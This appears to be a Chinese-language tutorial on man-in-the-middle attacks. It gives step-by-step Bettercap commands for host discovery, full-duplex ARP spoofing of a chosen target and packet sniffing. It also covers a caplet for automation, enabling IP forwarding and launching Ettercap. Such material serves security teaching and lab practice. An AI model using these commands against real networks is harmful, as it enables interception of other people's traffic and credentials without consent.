今天的分享是中間人攻擊(MITM),會介紹兩種工具(Bettercap與Ettercap)的使用:
介紹:
-接下來將介紹使用 Bettercap 工具進行 ARP 欺騙攻擊來實施中間人攻擊。
準備:
apt-get install bettercap
進行安裝。(-y是遇到yes/no都直接幫你選yes)啟動 Bettercap:
bettercap
命令進入 Bettercap 框架。help
命令查看可用的指令和模組。模組說明:
net.probe on
啟動模組,會發送 UDP 封包給子網中的每個 IP 地址,並發現網路上的在線設備。arp.spoof.fullduplex
:設置為 true
時,將同時攻擊目標和網關;否則僅攻擊目標。arp.spoof.targets
:設置要攻擊的目標 IP 地址。net.sniff.local
:設置為 true
時,僅嗅探到/從本機發送的封包。實施攻擊:
設置參數並啟動模組:
set arp.spoof.fullduplex true
set arp.spoof.targets [目標 IP 地址]
set net.sniff.local true
arp.spoof on
net.sniff on
當目標設備訪問網頁時,可以看到相關的請求封包。
自動化運行:
sniff.cap
的檔案中。bettercap -iface [網卡介面] -caplet sniff.cap
小結:
cat /proc/sys/net/ipv4/ip_forward
0
,表示封包轉發未啟用,需手動啟用。echo 1 > /proc/sys/net/ipv4/ip_forward
1
。ettercap -G
(確保 "ettercap" 為小寫)arp -a
指令查看 ARP 快取表。